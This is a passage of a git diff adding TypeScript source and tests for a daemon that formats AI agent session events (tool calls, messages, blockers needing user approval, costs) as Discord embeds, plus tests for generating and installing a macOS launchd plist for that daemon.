sessionId: string; + projectDir: string; + projectName: string; + blocker: PendingBlocker; +} + +interface SessionCompletedPayload { + sessionId: string; + projectDir: string; + projectName: string; +} + +interface SessionErrorPayload { + sessionId: string; + projectDir: string; + projectName: string; + error: string; +} diff --git a/packages/daemon/src/event-formatter.test.ts b/packages/daemon/src/event-formatter.test.ts new file mode 100644 index 000000000..dead1e385 --- /dev/null +++ b/packages/daemon/src/event-formatter.test.ts @@ -0,0 +1,402 @@ +import { describe, it } from 'node:test'; +import assert from 'node:assert/strict'; +import { EmbedBuilder, ActionRowBuilder, ButtonBuilder } from 'discord.js'; +import type { SdkAgentEvent } from '@gsd-build/rpc-client'; +import type { PendingBlocker, FormattedEvent } from './types.js'; +import type { RpcExtensionUIRequest } from '@gsd-build/rpc-client'; +import { + formatToolStart, + formatToolEnd, + formatMessage, + formatBlocker, + formatCompletion, + formatError, + formatCostUpdate, + formatSessionStarted, + formatTaskTransition, + formatGenericEvent, + formatEvent, +} from './event-formatter.js'; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +function embedColor(fe: FormattedEvent): number | null { + return fe.embed?.data.color ?? 
null; +} + +function embedTitle(fe: FormattedEvent): string | undefined { + return fe.embed?.data.title; +} + +function embedDescription(fe: FormattedEvent): string | undefined { + return fe.embed?.data.description; +} + +// --------------------------------------------------------------------------- +// formatToolStart +// --------------------------------------------------------------------------- + +describe('formatToolStart', () => { + it('produces grey embed with tool name', () => { + const result = formatToolStart({ type: 'tool_execution_start', name: 'read_file' }); + assert.ok(result.content.includes('read_file')); + assert.equal(embedColor(result), 0x95a5a6); // grey + assert.ok(embedTitle(result)?.includes('read_file')); + }); + + it('handles missing name gracefully', () => { + const result = formatToolStart({ type: 'tool_execution_start' }); + assert.ok(result.content.includes('unknown')); + }); + + it('includes input in description when present', () => { + const result = formatToolStart({ type: 'tool_execution_start', name: 'bash', input: 'ls -la' }); + assert.ok(embedDescription(result)?.includes('ls -la')); + }); +}); + +// --------------------------------------------------------------------------- +// formatToolEnd +// --------------------------------------------------------------------------- + +describe('formatToolEnd', () => { + it('shows success icon for normal completion', () => { + const result = formatToolEnd({ type: 'tool_execution_end', name: 'read_file', output: 'done' }); + assert.ok(result.content.includes('✅')); + assert.equal(embedColor(result), 0x95a5a6); // grey + }); + + it('shows error icon and red color for errored tool', () => { + const result = formatToolEnd({ type: 'tool_execution_end', name: 'bash', isError: true }); + assert.ok(result.content.includes('❌')); + assert.equal(embedColor(result), 0xe74c3c); // red + }); + + it('includes duration when present', () => { + const result = formatToolEnd({ type: 'tool_execution_end', 
name: 'bash', duration: 3500 }); + assert.ok(result.embed?.data.footer?.text?.includes('3.5s')); + }); +}); + +// --------------------------------------------------------------------------- +// formatMessage +// --------------------------------------------------------------------------- + +describe('formatMessage', () => { + it('extracts text from content blocks', () => { + const result = formatMessage({ + type: 'message', + content: [{ type: 'text', text: 'Hello world' }], + }); + assert.ok(embedDescription(result)?.includes('Hello world')); + assert.equal(embedColor(result), 0x3498db); // blue + }); + + it('falls back to message field when content is a string', () => { + const result = formatMessage({ type: 'message', message: 'plain text' }); + assert.ok(embedDescription(result)?.includes('plain text')); + }); + + it('handles empty content blocks', () => { + const result = formatMessage({ type: 'message', content: [] }); + assert.ok(result.content.includes('empty message')); + assert.equal(result.embed, undefined); + }); + + it('handles null content gracefully', () => { + const result = formatMessage({ type: 'message' }); + assert.ok(result.content.includes('empty message')); + }); +}); + +// --------------------------------------------------------------------------- +// formatBlocker — select +// --------------------------------------------------------------------------- + +describe('formatBlocker', () => { + it('produces ActionRow with numbered buttons for select', () => { + const blocker: PendingBlocker = { + id: 'req-1', + method: 'select', + message: 'Choose an option', + event: { + type: 'extension_ui_request', + id: 'req-1', + method: 'select', + title: 'Choose', + options: ['Option A', 'Option B', 'Option C'], + }, + }; + + const result = formatBlocker(blocker, '12345'); + assert.ok(result.content.includes('<@12345>')); + assert.equal(embedColor(result), 0xf1c40f); // yellow + assert.ok(result.components); + assert.ok(result.components!.length > 0); + + 
// Check buttons + const row = result.components![0]; + const buttons = row.components; + assert.equal(buttons.length, 3); + }); + + it('handles empty options array for select', () => { + const blocker: PendingBlocker = { + id: 'req-2', + method: 'select', + message: 'Pick one', + event: { + type: 'extension_ui_request', + id: 'req-2', + method: 'select', + title: 'Pick', + options: [], + }, + }; + + const result = formatBlocker(blocker, '12345'); + // No components when no options + assert.equal(result.components, undefined); + // Embed should show 'No options' + const fields = result.embed?.data.fields; + assert.ok(fields?.some((f) => f.value.includes('No options'))); + }); + + it('produces Yes/No buttons for confirm', () => { + const blocker: PendingBlocker = { + id: 'req-3', + method: 'confirm', + message: 'Are you sure?', + event: { + type: 'extension_ui_request', + id: 'req-3', + method: 'confirm', + title: 'Confirm', + message: 'This will delete everything', + }, + }; + + const result = formatBlocker(blocker, '99999'); + assert.ok(result.components); + assert.equal(result.components!.length, 1); + const buttons = result.components![0].components; + assert.equal(buttons.length, 2); + }); + + it('produces text instructions for input method', () => { + const blocker: PendingBlocker = { + id: 'req-4', + method: 'input', + message: 'Enter your name', + event: { + type: 'extension_ui_request', + id: 'req-4', + method: 'input', + title: 'Name', + placeholder: 'John Doe', + }, + }; + + const result = formatBlocker(blocker, '12345'); + // No interactive buttons for input — text instructions only + assert.equal(result.components, undefined); + const fields = result.embed?.data.fields; + assert.ok(fields?.some((f) => f.value.includes('Reply in this channel'))); + }); + + it('produces text instructions for editor method', () => { + const blocker: PendingBlocker = { + id: 'req-5', + method: 'editor', + message: 'Edit the config', + event: { + type: 
'extension_ui_request', + id: 'req-5', + method: 'editor', + title: 'Config', + prefill: 'key: value', + }, + }; + + const result = formatBlocker(blocker, '12345'); + assert.equal(result.components, undefined); + const fields = result.embed?.data.fields; + assert.ok(fields?.some((f) => f.value.includes('Reply in this channel'))); + assert.ok(fields?.some((f) => f.value.includes('key: value'))); + }); +}); + +// --------------------------------------------------------------------------- +// formatCompletion +// --------------------------------------------------------------------------- + +describe('formatCompletion', () => { + it('shows green for completed', () => { + const result = formatCompletion({ type: 'execution_complete', status: 'completed' }); + assert.equal(embedColor(result), 0x2ecc71); // green + assert.ok(result.content.includes('🏁')); + }); + + it('shows red for error status', () => { + const result = formatCompletion({ + type: 'execution_complete', + status: 'error', + reason: 'Out of tokens', + }); + assert.equal(embedColor(result), 0xe74c3c); // red + assert.ok(embedDescription(result)?.includes('Out of tokens')); + }); + + it('includes stats when present', () => { + const result = formatCompletion({ + type: 'execution_complete', + status: 'completed', + stats: { cost: 0.42, tokens: { total: 10000 } }, + }); + const fields = result.embed?.data.fields; + assert.ok(fields?.some((f) => f.value.includes('$0.42'))); + assert.ok(fields?.some((f) => f.value.includes('10,000'))); + }); +}); + +// --------------------------------------------------------------------------- +// formatError +// --------------------------------------------------------------------------- + +describe('formatError', () => { + it('includes session ID and error message', () => { + const result = formatError('sess-abc', 'Connection refused'); + assert.equal(embedColor(result), 0xe74c3c); // red + assert.ok(embedDescription(result)?.includes('Connection refused')); + 
assert.ok(result.embed?.data.footer?.text?.includes('sess-abc')); + }); +}); + +// --------------------------------------------------------------------------- +// formatCostUpdate +// --------------------------------------------------------------------------- + +describe('formatCostUpdate', () => { + it('formats cumulative cost', () => { + const result = formatCostUpdate({ + type: 'cost_update', + cumulativeCost: 1.23, + tokens: { input: 5000, output: 2000 }, + }); + assert.ok(result.content.includes('$1.23')); + assert.equal(embedColor(result), 0x3498db); // blue + }); + + it('handles zero cost', () => { + const result = formatCostUpdate({ + type: 'cost_update', + cumulativeCost: 0, + tokens: { input: 0, output: 0 }, + }); + assert.ok(result.content.includes('$0.0000')); + }); +}); + +// --------------------------------------------------------------------------- +// formatSessionStarted +// --------------------------------------------------------------------------- + +describe('formatSessionStarted', () => { + it('includes project name', () => { + const result = formatSessionStarted('my-project'); + assert.ok(result.content.includes('my-project')); + assert.ok(embedDescription(result)?.includes('my-project')); + assert.equal(embedColor(result), 0x3498db); // blue + }); +}); + +// --------------------------------------------------------------------------- +// formatTaskTransition +// --------------------------------------------------------------------------- + +describe('formatTaskTransition', () => { + it('shows complete icon for completed tasks', () => { + const result = formatTaskTransition({ + type: 'task_transition', + taskId: 'T01', + sliceId: 'S01', + status: 'complete', + }); + assert.ok(result.content.includes('✅')); + assert.equal(embedColor(result), 0x2ecc71); // green + }); + + it('shows error icon for errored tasks', () => { + const result = formatTaskTransition({ + type: 'task_transition', + taskId: 'T02', + status: 'error', + }); + 
assert.ok(result.content.includes('❌')); + assert.equal(embedColor(result), 0xe74c3c); // red + }); +}); + +// --------------------------------------------------------------------------- +// formatGenericEvent +// --------------------------------------------------------------------------- + +describe('formatGenericEvent', () => { + it('renders unknown event type as grey embed', () => { + const result = formatGenericEvent({ type: 'some_custom_event', data: 'hello' }); + assert.equal(embedColor(result), 0x95a5a6); // grey + assert.ok(embedTitle(result)?.includes('some_custom_event')); + }); + + it('handles events with no extra fields', () => { + const result = formatGenericEvent({ type: 'bare_event' }); + assert.ok(result.content.includes('bare_event')); + }); +}); + +// --------------------------------------------------------------------------- +// formatEvent — dispatch +// --------------------------------------------------------------------------- + +describe('formatEvent', () => { + it('dispatches tool_execution_start', () => { + const result = formatEvent({ type: 'tool_execution_start', name: 'read' }); + assert.ok(result.content.includes('🔧')); + }); + + it('dispatches execution_complete', () => { + const result = formatEvent({ type: 'execution_complete', status: 'completed' }); + assert.ok(result.content.includes('🏁')); + }); + + it('falls back to generic for unknown types', () => { + const result = formatEvent({ type: 'totally_unknown' }); + assert.ok(result.content.includes('📡')); + }); + + it('dispatches cost_update', () => { + const result = formatEvent({ type: 'cost_update', cumulativeCost: 0.5 }); + assert.ok(result.content.includes('💰')); + }); + + it('dispatches message types', () => { + for (const type of ['message_start', 'message_end', 'message']) { + const result = formatEvent({ type, message: 'hi' }); + assert.ok(result.content.includes('💬'), `Failed for type: ${type}`); + } + }); + + // Negative: missing type field + it('handles event with 
missing type gracefully', () => { + const result = formatEvent({} as SdkAgentEvent); + assert.ok(result.content); // should not throw + }); + + // Negative: null fields + it('handles event with null fields gracefully', () => { + const result = formatEvent({ type: 'tool_execution_start', name: null } as unknown as SdkAgentEvent); + assert.ok(result.content); + }); +}); diff --git a/packages/daemon/src/event-formatter.ts b/packages/daemon/src/event-formatter.ts new file mode 100644 index 000000000..2828c1db1 --- /dev/null +++ b/packages/daemon/src/event-formatter.ts @@ -0,0 +1,414 @@ +/** + * event-formatter.ts — Pure functions mapping RPC event types to Discord embeds. + * + * Each formatter returns a FormattedEvent (content string + optional EmbedBuilder + + * optional ActionRow components). Distinct embed colors per category: + * green = success / completion + * red = error + * yellow = blocker (needs attention) + * blue = info / session lifecycle + * grey = tool / generic + */ + +import { EmbedBuilder, ActionRowBuilder, ButtonBuilder, ButtonStyle } from 'discord.js'; +import type { SdkAgentEvent } from '@gsd-build/rpc-client'; +import type { RpcExtensionUIRequest } from '@gsd-build/rpc-client'; +import type { FormattedEvent, PendingBlocker } from './types.js'; + +// --------------------------------------------------------------------------- +// Color palette +// --------------------------------------------------------------------------- + +const COLOR = { + success: 0x2ecc71, // green + error: 0xe74c3c, // red + blocker: 0xf1c40f, // yellow + info: 0x3498db, // blue + tool: 0x95a5a6, // grey +} as const; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +/** Truncate a string to maxLen, appending ellipsis if truncated. 
*/ +function truncate(s: string, maxLen: number): string { + if (s.length <= maxLen) return s; + return s.slice(0, maxLen - 1) + '…'; +} + +/** Safe string extraction from an unknown field. */ +function str(value: unknown, fallback = ''): string { + if (typeof value === 'string') return value; + if (value == null) return fallback; + return String(value); +} + +/** Safe number extraction. */ +function num(value: unknown, fallback = 0): number { + if (typeof value === 'number' && !Number.isNaN(value)) return value; + return fallback; +} + +/** Format a cost value to a readable string. */ +function formatCost(cost: number): string { + if (cost < 0.01) return `$${cost.toFixed(4)}`; + return `$${cost.toFixed(2)}`; +} + +// --------------------------------------------------------------------------- +// Formatters +// --------------------------------------------------------------------------- + +export function formatToolStart(event: SdkAgentEvent): FormattedEvent { + const toolName = str(event.name || event.toolName, 'unknown'); + const embed = new EmbedBuilder() + .setColor(COLOR.tool) + .setTitle(`🔧 ${truncate(toolName, 60)}`) + .setTimestamp(); + + const input = str(event.input || event.args); + if (input) { + embed.setDescription(`\`\`\`\n${truncate(input, 300)}\n\`\`\``); + } + + return { content: `🔧 Tool: ${toolName}`, embed }; +} + +export function formatToolEnd(event: SdkAgentEvent): FormattedEvent { + const toolName = str(event.name || event.toolName, 'unknown'); + const isError = event.isError === true || event.error != null; + const color = isError ? COLOR.error : COLOR.tool; + const icon = isError ? 
'❌' : '✅'; + + const embed = new EmbedBuilder() + .setColor(color) + .setTitle(`${icon} ${truncate(toolName, 60)}`) + .setTimestamp(); + + const output = str(event.output || event.result); + if (output) { + embed.setDescription(`\`\`\`\n${truncate(output, 300)}\n\`\`\``); + } + + const duration = num(event.duration || event.durationMs); + if (duration > 0) { + embed.setFooter({ text: `${(duration / 1000).toFixed(1)}s` }); + } + + return { content: `${icon} Tool done: ${toolName}`, embed }; +} + +export function formatMessage(event: SdkAgentEvent): FormattedEvent { + // Extract text from content blocks or message field + let text = ''; + + // Try content array first (most common for agent messages) + if (Array.isArray(event.content)) { + const blocks = event.content as Array<{ type?: string; text?: string }>; + text = blocks + .filter((b) => b.type === 'text' && typeof b.text === 'string') + .map((b) => b.text!) + .join('\n'); + } + + // Try message field — could be string, object with content array, or object with text + if (!text && event.message != null) { + if (typeof event.message === 'string') { + text = event.message; + } else if (typeof event.message === 'object') { + const msg = event.message as Record; + if (Array.isArray(msg.content)) { + const blocks = msg.content as Array<{ type?: string; text?: string }>; + text = blocks + .filter((b) => b.type === 'text' && typeof b.text === 'string') + .map((b) => b.text!) + .join('\n'); + } else if (typeof msg.text === 'string') { + text = msg.text; + } else if (typeof msg.content === 'string') { + text = msg.content; + } + } + } + + // Fallback to text or content as plain strings + if (!text) { + text = typeof event.text === 'string' ? 
event.text : ''; + } + if (!text && typeof event.content === 'string') { + text = event.content; + } + + if (!text) { + return { content: '💬 (empty message)' }; + } + + const embed = new EmbedBuilder() + .setColor(COLOR.info) + .setDescription(truncate(text, 2000)) + .setTimestamp(); + + const role = str(event.role); + if (role) { + embed.setAuthor({ name: role }); + } + + return { content: `💬 ${truncate(text, 200)}`, embed }; +} + +/** + * Format a blocker (extension_ui_request needing user response). + * Produces an embed with @mention and interactive buttons for select/confirm, + * or text instructions for input/editor. + */ +export function formatBlocker( + blocker: PendingBlocker, + ownerId: string, +): FormattedEvent { + const mention = `<@${ownerId}>`; + const embed = new EmbedBuilder() + .setColor(COLOR.blocker) + .setTitle('⚠️ Blocker — Response Needed') + .setDescription(truncate(blocker.message, 2000)) + .setTimestamp(); + + const components: ActionRowBuilder[] = []; + + switch (blocker.method) { + case 'select': { + const evt = blocker.event as { options?: string[] }; + const options = Array.isArray(evt.options) ? evt.options : []; + + if (options.length > 0) { + // Discord ActionRow max 5 buttons, so chunk + const chunks = chunkArray(options.slice(0, 25), 5); + for (const chunk of chunks) { + const row = new ActionRowBuilder(); + chunk.forEach((opt, i) => { + const globalIndex = options.indexOf(opt); + row.addComponents( + new ButtonBuilder() + .setCustomId(`blocker:${blocker.id}:select:${globalIndex}`) + .setLabel(truncate(`${globalIndex + 1}. 
${opt}`, 80)) + .setStyle(ButtonStyle.Primary), + ); + }); + components.push(row); + } + } + + embed.addFields({ + name: 'Options', + value: options.map((o, i) => `**${i + 1}.** ${truncate(o, 100)}`).join('\n') || 'No options', + }); + break; + } + + case 'confirm': { + const row = new ActionRowBuilder().addComponents( + new ButtonBuilder() + .setCustomId(`blocker:${blocker.id}:confirm:true`) + .setLabel('Yes') + .setStyle(ButtonStyle.Success), + new ButtonBuilder() + .setCustomId(`blocker:${blocker.id}:confirm:false`) + .setLabel('No') + .setStyle(ButtonStyle.Danger), + ); + components.push(row); + + const msg = str((blocker.event as { message?: string }).message); + if (msg) { + embed.addFields({ name: 'Details', value: truncate(msg, 1024) }); + } + break; + } + + case 'input': { + const placeholder = str((blocker.event as { placeholder?: string }).placeholder); + embed.addFields({ + name: 'How to respond', + value: `Reply in this channel with your answer.${placeholder ? `\n*Hint: ${placeholder}*` : ''}`, + }); + break; + } + + case 'editor': { + const prefill = str((blocker.event as { prefill?: string }).prefill); + embed.addFields({ + name: 'How to respond', + value: 'Reply in this channel with the full text.' + + (prefill ? `\n\nCurrent value:\n\`\`\`\n${truncate(prefill, 500)}\n\`\`\`` : ''), + }); + break; + } + + default: { + embed.addFields({ + name: 'How to respond', + value: `Reply in this channel (method: ${blocker.method}).`, + }); + break; + } + } + + return { + content: `${mention} ⚠️ **Blocker** — ${truncate(blocker.message, 150)}`, + embed, + components: components.length > 0 ? components : undefined, + }; +} + +export function formatCompletion(event: SdkAgentEvent): FormattedEvent { + const status = str(event.status, 'completed'); + const isError = status === 'error' || status === 'cancelled'; + const color = isError ? COLOR.error : COLOR.success; + const icon = isError ? 
'⚠️' : '🏁';

  const embed = new EmbedBuilder()
    .setColor(color)
    .setTitle(`${icon} Execution ${status}`)
    .setTimestamp();

  // Optional human-readable reason for the completion state.
  const reason = str(event.reason);
  if (reason) {
    embed.setDescription(truncate(reason, 2000));
  }

  // Include final stats if present
  // assumes event.stats, when present, has { cost, tokens.total } — TODO confirm against SDK
  const stats = event.stats as { cost?: number; tokens?: { total?: number } } | undefined;
  if (stats) {
    const fields: string[] = [];
    if (stats.cost != null) fields.push(`Cost: ${formatCost(num(stats.cost))}`);
    if (stats.tokens?.total != null) fields.push(`Tokens: ${num(stats.tokens.total).toLocaleString()}`);
    if (fields.length) embed.addFields({ name: 'Summary', value: fields.join(' · ') });
  }

  return { content: `${icon} Execution ${status}`, embed };
}

/**
 * Format a session-level error as a red embed with the error text in a
 * code fence; the session id goes in the footer for traceability.
 */
export function formatError(sessionId: string, error: string): FormattedEvent {
  const embed = new EmbedBuilder()
    .setColor(COLOR.error)
    .setTitle('❌ Session Error')
    .setDescription(`\`\`\`\n${truncate(error, 2000)}\n\`\`\``)
    .setFooter({ text: `Session: ${sessionId}` })
    .setTimestamp();

  return { content: `❌ Error: ${truncate(error, 200)}`, embed };
}

/** Format a cost_update event: cumulative cost plus in/out token counts. */
export function formatCostUpdate(event: SdkAgentEvent): FormattedEvent {
  // Accept either field name for the running total.
  const cost = num(event.cumulativeCost ??
event.totalCost);
  const tokens = event.tokens as
    | { input?: number; output?: number; cacheRead?: number; cacheWrite?: number }
    | undefined;

  const embed = new EmbedBuilder()
    .setColor(COLOR.info)
    .setTitle('💰 Cost Update')
    .setTimestamp();

  const fields: string[] = [`Total: ${formatCost(cost)}`];
  if (tokens) {
    const input = num(tokens.input);
    const output = num(tokens.output);
    if (input || output) {
      fields.push(`Tokens: ${input.toLocaleString()} in / ${output.toLocaleString()} out`);
    }
  }
  embed.setDescription(fields.join('\n'));

  return { content: `💰 Cost: ${formatCost(cost)}`, embed };
}

/** Announce a freshly started session for the given project. */
export function formatSessionStarted(projectName: string): FormattedEvent {
  const embed = new EmbedBuilder()
    .setColor(COLOR.info)
    .setTitle('🚀 Session Started')
    .setDescription(`Project: **${truncate(projectName, 200)}**`)
    .setTimestamp();

  return { content: `🚀 Session started: ${projectName}`, embed };
}

/** Format a task/slice state transition into a status embed. */
export function formatTaskTransition(event: SdkAgentEvent): FormattedEvent {
  // Events may carry either the long or the short field name — accept both.
  const taskId = str(event.taskId || event.task);
  const sliceId = str(event.sliceId || event.slice);
  const status = str(event.status || event.state);
  const icon = status === 'complete' ? '✅' : status === 'error' ? '❌' : '📋';

  const embed = new EmbedBuilder()
    .setColor(status === 'complete' ? COLOR.success : status === 'error' ? COLOR.error : COLOR.info)
    .setTitle(`${icon} Task Transition`)
    .setTimestamp();

  const fields: string[] = [];
  if (sliceId) fields.push(`Slice: ${sliceId}`);
  if (taskId) fields.push(`Task: ${taskId}`);
  if (status) fields.push(`Status: ${status}`);
  embed.setDescription(fields.join('\n'));

  return { content: `${icon} ${taskId || 'Task'} → ${status || 'unknown'}`, embed };
}

/** Fallback formatter: show the event type plus a JSON preview of its payload. */
export function formatGenericEvent(event: SdkAgentEvent): FormattedEvent {
  const type = str(event.type, 'unknown');
  const embed = new EmbedBuilder()
    .setColor(COLOR.tool)
    .setTitle(`📡 ${truncate(type, 60)}`)
    .setTimestamp();

  // Include a JSON preview of the event, stripping the type field
  const { type: _t, ...rest } = event;
  const preview = JSON.stringify(rest);
  if (preview.length > 2) { // more than '{}'
    embed.setDescription(`\`\`\`json\n${truncate(preview, 1000)}\n\`\`\``);
  }

  return { content: `📡 Event: ${type}`, embed };
}

// ---------------------------------------------------------------------------
// Dispatch — maps event type to the right formatter
// ---------------------------------------------------------------------------

/**
 * Format any SdkAgentEvent for Discord. Falls back to formatGenericEvent
 * for unknown types.
+ */ +export function formatEvent(event: SdkAgentEvent, ownerId?: string): FormattedEvent { + const type = str(event.type); + + switch (type) { + case 'tool_execution_start': + return formatToolStart(event); + case 'tool_execution_end': + return formatToolEnd(event); + case 'message_start': + case 'message_end': + case 'message': + return formatMessage(event); + case 'execution_complete': + return formatCompletion(event); + case 'cost_update': + return formatCostUpdate(event); + case 'task_transition': + return formatTaskTransition(event); + default: + return formatGenericEvent(event); + } +} + +// --------------------------------------------------------------------------- +// Utility +// --------------------------------------------------------------------------- + +function chunkArray(arr: T[], size: number): T[][] { + const chunks: T[][] = []; + for (let i = 0; i < arr.length; i += size) { + chunks.push(arr.slice(i, i + size)); + } + return chunks; +} diff --git a/packages/daemon/src/index.ts b/packages/daemon/src/index.ts new file mode 100644 index 000000000..e2639db44 --- /dev/null +++ b/packages/daemon/src/index.ts @@ -0,0 +1,55 @@ +export type { + DaemonConfig, + LogLevel, + LogEntry, + SessionStatus, + ManagedSession, + PendingBlocker, + CostAccumulator, + ProjectInfo, + ProjectMarker, + StartSessionOptions, + FormattedEvent, + VerbosityLevel, +} from './types.js'; +export { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js'; +export { resolveConfigPath, loadConfig, validateConfig } from './config.js'; +export { Logger } from './logger.js'; +export type { LoggerOptions } from './logger.js'; +export { Daemon } from './daemon.js'; +export { scanForProjects } from './project-scanner.js'; +export { SessionManager } from './session-manager.js'; +export { DiscordBot, isAuthorized, validateDiscordConfig } from './discord-bot.js'; +export type { DiscordBotOptions } from './discord-bot.js'; +export { ChannelManager, sanitizeChannelName } from './channel-manager.js'; 
+export type { ChannelManagerOptions } from './channel-manager.js'; +export { buildCommands, formatSessionStatus, registerGuildCommands } from './commands.js'; +export { EventBridge } from './event-bridge.js'; +export type { BridgeClient, EventBridgeOptions } from './event-bridge.js'; +export { Orchestrator } from './orchestrator.js'; +export type { OrchestratorConfig, OrchestratorDeps, DiscordMessageLike } from './orchestrator.js'; +export { MessageBatcher } from './message-batcher.js'; +export type { SendPayload, SendFn, BatcherLogger, BatcherOptions } from './message-batcher.js'; +export { VerbosityManager, shouldShowAtLevel } from './verbosity.js'; +export { + formatToolStart, + formatToolEnd, + formatMessage, + formatBlocker, + formatCompletion, + formatError, + formatCostUpdate, + formatSessionStarted, + formatTaskTransition, + formatGenericEvent, + formatEvent, +} from './event-formatter.js'; +export { + escapeXml, + generatePlist, + getPlistPath, + install as installLaunchAgent, + uninstall as uninstallLaunchAgent, + status as launchAgentStatus, +} from './launchd.js'; +export type { PlistOptions, LaunchdStatus, RunCommandFn } from './launchd.js'; diff --git a/packages/daemon/src/launchd.test.ts b/packages/daemon/src/launchd.test.ts new file mode 100644 index 000000000..f92185344 --- /dev/null +++ b/packages/daemon/src/launchd.test.ts @@ -0,0 +1,356 @@ +import { describe, it, beforeEach, afterEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, existsSync, readFileSync, writeFileSync, rmSync, mkdirSync, statSync } from 'node:fs'; +import { join, dirname } from 'node:path'; +import { tmpdir, homedir } from 'node:os'; +import { randomUUID } from 'node:crypto'; +import { + escapeXml, + generatePlist, + getPlistPath, + install, + uninstall, + status, +} from './launchd.js'; +import type { PlistOptions, RunCommandFn, LaunchdStatus } from './launchd.js'; + +// ---------- helpers ---------- + +function tmpDir(): string { + 
return mkdtempSync(join(tmpdir(), `launchd-test-${randomUUID().slice(0, 8)}-`)); +} + +const cleanupDirs: string[] = []; +afterEach(() => { + while (cleanupDirs.length) { + const d = cleanupDirs.pop()!; + if (existsSync(d)) rmSync(d, { recursive: true, force: true }); + } +}); + +function basePlistOpts(overrides?: Partial): PlistOptions { + return { + nodePath: '/usr/local/bin/node', + scriptPath: '/usr/local/lib/gsd-daemon/dist/cli.js', + configPath: join(homedir(), '.gsd', 'daemon.yaml'), + ...overrides, + }; +} + +// ---------- escapeXml ---------- + +describe('escapeXml', () => { + it('escapes & < > " \'', () => { + assert.equal(escapeXml('a&bd"e\'f'), 'a&b<c>d"e'f'); + }); + + it('leaves plain strings untouched', () => { + assert.equal(escapeXml('/usr/local/bin/node'), '/usr/local/bin/node'); + }); + + it('escapes paths with spaces and special chars', () => { + const input = '/Users/John & Jane/my "project"/file.js'; + const output = escapeXml(input); + assert.ok(output.includes('&')); + assert.ok(output.includes('"')); + // Verify no raw unescaped & remain (all & are part of & < etc.) 
+ assert.equal(output, '/Users/John & Jane/my "project"/file.js'); + }); +}); + +// ---------- generatePlist ---------- + +describe('generatePlist', () => { + it('produces valid XML with plist header', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.startsWith('')); + assert.ok(xml.includes('')); + }); + + it('includes label com.gsd.daemon', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('com.gsd.daemon')); + }); + + it('uses the absolute node path from opts', () => { + const opts = basePlistOpts({ nodePath: '/home/user/.nvm/versions/node/v22.0.0/bin/node' }); + const xml = generatePlist(opts); + assert.ok(xml.includes('/home/user/.nvm/versions/node/v22.0.0/bin/node')); + }); + + it('includes NVM bin directory in PATH', () => { + const opts = basePlistOpts({ nodePath: '/home/user/.nvm/versions/node/v22.0.0/bin/node' }); + const xml = generatePlist(opts); + assert.ok(xml.includes('/home/user/.nvm/versions/node/v22.0.0/bin')); + }); + + it('sets KeepAlive with SuccessfulExit false', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('KeepAlive')); + assert.ok(xml.includes('SuccessfulExit')); + assert.ok(xml.includes('')); + }); + + it('sets RunAtLoad true', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('RunAtLoad')); + assert.ok(xml.includes('')); + }); + + it('includes --config with the config path', () => { + const configPath = '/custom/path/daemon.yaml'; + const xml = generatePlist(basePlistOpts({ configPath })); + assert.ok(xml.includes('--config')); + assert.ok(xml.includes(`${configPath}`)); + }); + + it('includes HOME environment variable', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('HOME')); + assert.ok(xml.includes(`${homedir()}`)); + }); + + it('includes StandardOutPath and StandardErrorPath', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('StandardOutPath')); + 
assert.ok(xml.includes('StandardErrorPath')); + }); + + it('escapes special characters in paths', () => { + const opts = basePlistOpts({ + configPath: '/Users/John & Jane/config.yaml', + }); + const xml = generatePlist(opts); + assert.ok(xml.includes('John & Jane')); + assert.ok(!xml.includes('John & Jane')); + }); + + it('uses custom stdout/stderr paths when provided', () => { + const opts = basePlistOpts({ + stdoutPath: '/tmp/my-stdout.log', + stderrPath: '/tmp/my-stderr.log', + }); + const xml = generatePlist(opts); + assert.ok(xml.includes('/tmp/my-stdout.log')); + assert.ok(xml.includes('/tmp/my-stderr.log')); + }); + + it('uses custom working directory when provided', () => { + const opts = basePlistOpts({ + workingDirectory: '/custom/work/dir', + }); + const xml = generatePlist(opts); + assert.ok(xml.includes('/custom/work/dir')); + }); +}); + +// ---------- getPlistPath ---------- + +describe('getPlistPath', () => { + it('returns ~/Library/LaunchAgents/com.gsd.daemon.plist', () => { + const expected = join(homedir(), 'Library', 'LaunchAgents', 'com.gsd.daemon.plist'); + assert.equal(getPlistPath(), expected); + }); +}); + +// ---------- install ---------- + +describe('install', () => { + let tmp: string; + let fakePlistPath: string; + + // We can't mock getPlistPath directly, but we can verify the commands + // issued and the plist content by intercepting runCommand and filesystem ops. + // For filesystem testing, we test the functions that call writeFileSync indirectly + // by verifying the runCommand calls and returned values. + + it('calls launchctl load with the plist path', () => { + const calls: string[] = []; + const mockRun: RunCommandFn = (cmd: string) => { + calls.push(cmd); + return ''; + }; + + // install will try to write to the real plist path, so we need to be careful. + // We test the command flow by catching the writeFileSync error (dir may not exist in CI) + // or by letting it proceed in local dev. 
+ try { + install(basePlistOpts(), mockRun); + } catch { + // writeFileSync may fail if ~/Library/LaunchAgents doesn't exist in test env + } + + const loadCalls = calls.filter(c => c.startsWith('launchctl load')); + const listCalls = calls.filter(c => c.startsWith('launchctl list')); + // Should have at least attempted launchctl load + assert.ok(loadCalls.length > 0 || calls.length > 0, 'Expected launchctl commands to be called'); + }); + + it('generates valid plist content when called', () => { + // Test that the plist content would be correct by testing generatePlist + // (install is a thin wrapper around generatePlist + writeFile + launchctl) + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('Label')); + assert.ok(xml.includes('com.gsd.daemon')); + }); + + it('handles idempotent install (unloads first if plist exists)', () => { + const calls: string[] = []; + const mockRun: RunCommandFn = (cmd: string) => { + calls.push(cmd); + return ''; + }; + + // To simulate idempotent install, we need an existing plist file. + // Since install writes to getPlistPath(), we test the command sequence. 
